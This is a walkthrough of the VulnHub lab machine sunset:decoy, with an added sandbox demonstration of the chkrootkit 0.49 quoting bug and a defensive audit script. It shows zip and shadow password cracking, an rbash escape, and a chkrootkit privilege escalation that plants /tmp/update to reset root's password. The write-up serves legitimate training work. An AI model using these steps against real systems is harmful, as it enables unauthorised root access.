VulnHub machine: sunset:decoy (cr4ke3's blog)

Tags: vulnhub machines

1. Find the target's IP: 192.168.0.129

nmap -sn 192.168.0.0/24

2. Scan the target's ports. Apart from 22 and 80, which are open, the remaining few are filtered.

[email protected]:~# nmap -p- -A 192.168.0.129
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.129
Host is up (0.0057s latency).
Not shown: 65528 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
|   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp    open     http           Apache httpd 2.4.38
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.0K  2020-07-07 16:36  save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
3986/tcp  filtered mapper-ws_ethd
3990/tcp  filtered bv-is
9603/tcp  filtered unknown
37935/tcp filtered unknown
63217/tcp filtered unknown
MAC Address: 08:00:27:76:C4:0E (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/20%OT=22%CT=1%CU=33838%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F14F065%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   5.71 ms 192.168.0.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.47 seconds

3. Port 80 serves a zip archive.

Extracting it requires a password, so crack it with a wordlist. There are several ways to do this.

Method one: use the fcrackzip command directly

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip

Method two: first extract the archive's hash with zip2john, then run a wordlist attack with john

[email protected]:~# zip2john save.zip > save.hash
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
[email protected]:~# cat save.hash 
save.zip:$pkzip2$3*2*1*0*8*24*a1f8*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*b3ac*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*d9c3*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip2$::save.zip:etc/hostname, etc/group, etc/passwd:save.zip
[email protected]:~# john --wordlist=/usr/share/wordlists/rockyou.txt save.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel           (save.zip)
1g 0:00:00:00 DONE (2020-07-20 15:01) 12.50g/s 2400p/s 2400c/s 2400C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed
[email protected]:~# unzip save.zip 
Archive:  save.zip
[save.zip] etc/passwd password: manuel (not echoed)
  inflating: etc/passwd              
  inflating: etc/shadow              
  inflating: etc/group               
  inflating: etc/sudoers             
  inflating: etc/hosts               
 extracting: etc/hostname            
[email protected]:~# 

Other methods: find a tool online, or a script, and crack it with that.

4. The archive contains a shadow file, so run john against it. It cracks one user's password; the other one (root) is not expected to crack.

[email protected]:~# cd etc/
[email protected]:~/etc# ls
group  hostname  hosts  passwd  shadow  sudoers
[email protected]:~/etc# john --wordlist=/usr/share/wordlists/rockyou.txt shadow 
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
server           (296640a3b825115a47b68fc44501c828)

5. Log in over SSH with the username and password, but the login shell is rbash (a restricted shell), so many commands cannot be run.

[email protected]:~/etc# ssh 296640a3b825115a47b68fc44501c828@192.168.0.129
The authenticity of host '192.168.0.129 (192.168.0.129)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.129' (ECDSA) to the list of known hosts.
[email protected]'s password: server (not echoed)
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul  7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
[email protected]2:~$ whoami
-rbash: whoami: command not found
[email protected]2:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
[email protected]2:~$ cat
-rbash: cat: command not found

6. Adding -t "bash --noprofile" to the ssh command bypasses the restricted shell; then set the PATH environment variable and the first flag can be read.

[email protected]:~/etc# ssh 296640a3b825115a47b68fc44501c828@192.168.0.129 -t "bash --noprofile"
[email protected]'s password: server (not echoed)
bash: dircolors: command not found
[email protected]2:~$ echo $PATH
PATH:/home/296640a3b825115a47b68fc44501c828/
[email protected]2:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[email protected]2:~$ whoami
296640a3b825115a47b68fc44501c828
[email protected]2:~$ cat user.txt 
35253d886842075b2c6390f35946e41f
[email protected]2:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[email protected]2:~$ 

7. In the home directory the only thing we have permission to enter is the SV-502 directory, which contains a logs/log.txt file

[email protected]2:~$ ls -l
total 32
-rwxr-xr-x 1 root                             root                             17480 Jul  7 16:19 honeypot.decoy
-rw------- 1 root                             root                              1855 Jul  7 16:19 honeypot.decoy.cpp
lrwxrwxrwx 1 root                             root                                 7 Jun 27 18:32 id -> /bin/id
lrwxrwxrwx 1 root                             root                                13 Jun 27 18:32 ifconfig -> /bin/ifconfig
lrwxrwxrwx 1 root                             root                                 7 Jun 27 18:32 ls -> /bin/ls
lrwxrwxrwx 1 root                             root                                10 Jun 27 18:31 mkdir -> /bin/mkdir
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  4096 Jun 27 18:59 SV-502
-rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    33 Jul  7 17:06 user.txt
[email protected]2:~$ cat honeypot.decoy.cpp 
cat: honeypot.decoy.cpp: Permission denied
[email protected]2:~$ cd SV-502/
[email protected]2:~/SV-502$ ls
fich  logs
[email protected]2:~/SV-502$ cd logs/
[email protected]2:~/SV-502/logs$ ls
log.txt

Reading it, it is a pspy64 process log, and one line in it is useful

chkrootkit 0.49 has a known local privilege escalation vulnerability with plenty of write-ups online, but it requires chkrootkit to actually run, and the log shows no such run. Earlier, the home directory also contained honeypot.decoy, which we have execute permission on. Running it presents 8 options; seven of them are of no use, but the fifth launches an "AV Scan", which should be what starts chkrootkit.

[email protected]:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
[email protected]2:~$ 

Download pspy64 onto the target to confirm: chkrootkit is indeed running as root (uid=0)

Next is privilege escalation. Kali's copy of the exploit-db entry also describes the vulnerability in this program: as an ordinary user, create an executable file named update in /tmp, then run the vulnerable chkrootkit, and that file is executed as root

[email protected]:~# searchsploit chkrootkit 
-------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                          |  Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)                                                    | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation                                                            | linux/local/33899.txt
-------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
[email protected]:~# searchsploit -p 33899
  Exploit: Chkrootkit 0.49 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/33899
     Path: /usr/share/exploitdb/exploits/linux/local/33899.txt
File Type: ASCII text, with CRLF line terminators

[email protected]:~# cat /usr/share/exploitdb/exploits/linux/local/33899.txt
We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).

The vulnerability is located in the function slapper() in the
shellscript chkrootkit:

#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
   SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
   SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
   ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
   SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
   OPT=-an
   STATUS=0
   file_port=

   if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
      then
      STATUS=1
      [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
         $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print  $7 }' |
tr -d :`
   fi
   for i in ${SLAPPER_FILES}; do
      if [ -f ${i} ]; then
         file_port=$file_port $i
         STATUS=1
      fi
   done
   if [ ${STATUS} -eq 1 ] ;then
      echo "Warning: Possible Slapper Worm installed ($file_port)"
   else
      if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
         return ${NOT_INFECTED}
   fi
}


The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.


Suggested fix: Put quotation marks around the assignment.

file_port="$file_port $i"


I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see, if I reach a dev there.
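To see exactly why the unquoted assignment executes the file, here is an added sandbox example (my own, not from the post and not chkrootkit's code). It recreates the slapper() loop in a temporary directory with a harmless stand-in for /tmp/update that only drops a marker file, and shows the quoted assignment from the suggested fix beside it. The sandbox directory, the stand-in script and the marker file are all constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original post or from chkrootkit): reproduces the
# word-splitting bug behind the chkrootkit 0.49 slapper() advisory in a sandbox,
# then shows the quoted fix. Nothing here touches the real /tmp/update.

SANDBOX=$(mktemp -d)          # constructed sandbox standing in for ${ROOTDIR}
MARKER="$SANDBOX/executed"    # the stand-in "update" only creates this file

# Harmless stand-in for /tmp/update: when run, it writes a marker and exits.
cat > "$SANDBOX/update" <<EOF
#!/bin/sh
echo ran > "$MARKER"
EOF
chmod +x "$SANDBOX/update"

# Vulnerable pattern from slapper(): with file_port empty, the shell parses
#   file_port=$file_port $i
# as "file_port= <command>", i.e. a temporary environment assignment followed
# by EXECUTING the path in $i, with whatever privileges this shell has.
vulnerable_scan() {
    file_port=
    for i in "$SANDBOX/update"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
}

# Fixed pattern (the advisory's suggested fix): the quotes make the whole
# right-hand side one value, so $i is appended to a string, never executed.
fixed_scan() {
    file_port=
    for i in "$SANDBOX/update"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    echo "$file_port"
}

# Returns 0 if the stand-in ran (marker present), 1 otherwise; clears the marker.
was_executed() {
    if [ -f "$MARKER" ]; then
        rm -f "$MARKER"
        return 0
    fi
    return 1
}
```

Run it with sh: after vulnerable_scan the marker exists (the stand-in was executed), after fixed_scan it does not and the function merely prints " <sandbox>/update". On a real host the same parse happens inside a root-owned chkrootkit, which is why a writable, executable /tmp turns a string-building bug into code execution as root.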

Two methods here

Method one: write a reverse-shell one-liner into the file, make it executable, listen locally, and get the final flag

Method two: write a one-liner that changes root's password (not really recommended), then switch directly to root

[email protected]2:~$ echo 'echo "root:123456" | sudo chpasswd' > /tmp/update
[email protected]2:~$ chmod 777 /tmp/update
[email protected]2:~$ su - root
Password: 123456 (not echoed)
[email protected]:~# 
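For the defender's side, an added check (my own, not part of the post or of chkrootkit) that audits the two preconditions the advisory names on a host: whether any of the file names slapper() looks for exists as an executable under tmp, and whether /tmp is mounted noexec. The root-prefix argument, the findmnt call and the options parser are my choices; passing a prefix other than / lets you run the file check against a constructed test tree.

```shell
#!/bin/sh
# Added example (not from the original post or from chkrootkit): audits the
# preconditions of the chkrootkit 0.49 slapper() bug on a host.
# The file list mirrors SLAPPER_FILES in the quoted slapper() function.

# Prints the paths slapper() would test under the given root prefix ($1, ending in /).
slapper_file_list() {
    echo "${1}tmp/.bugtraq ${1}tmp/.bugtraq.c ${1}tmp/.unlock ${1}tmp/httpd ${1}tmp/update ${1}tmp/.cinik ${1}tmp/.b"
}

# Prints a warning for each listed file that exists AND is executable, with its
# owner (GNU stat first, BSD stat as fallback). Returns 0 if any was found, 1 if none.
find_planted_files() {
    root="${1:-/}"
    found=1
    for f in $(slapper_file_list "$root"); do
        if [ -f "$f" ] && [ -x "$f" ]; then
            owner=$(stat -c %U "$f" 2>/dev/null || stat -f %Su "$f")
            echo "WARNING: $f is executable (owner: $owner); a root-run chkrootkit 0.49 would execute it"
            found=0
        fi
    done
    return $found
}

# Returns 0 if a comma-separated mount option string contains exactly "noexec".
options_have_noexec() {
    printf '%s\n' "$1" | tr ',' '\n' | grep -qx noexec
}

# Returns 0 if /tmp is its own mount with noexec (planted files cannot run there);
# returns 1 when it is not a separate mount, lacks noexec, or findmnt is unavailable.
tmp_is_noexec() {
    opts=$(findmnt -no OPTIONS /tmp 2>/dev/null) || return 1
    options_have_noexec "$opts"
}

# Stand-alone use: audit the live system.
if [ "${1:-}" = "--audit" ]; then
    find_planted_files / || echo "no executable slapper() file names present under /tmp"
    tmp_is_noexec && echo "/tmp is mounted noexec" || echo "/tmp is NOT noexec"
fi
```

Run it as `sh audit.sh --audit` on the host being checked. Either finding on its own is worth acting on: a noexec /tmp removes the execution path the advisory depends on, and an unexpected executable named update or httpd under /tmp is a sign that someone has prepared the box, independent of whether chkrootkit is installed.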

8. References

https://0xatom.github.io/vulnhub/2020/07/10/sunsetdecoy/

https://www.hackingarticles.in/sunset-decoy-vulnhub-walkthrough/


This series of machine write-ups is paused for now!

Copyright notice: this is the author's original article, released under the CC 4.0 BY-SA licence; reposts must include a link to the original and this notice.
Original link: https://blog.csdn.net/weixin_43784056/article/details/107456501
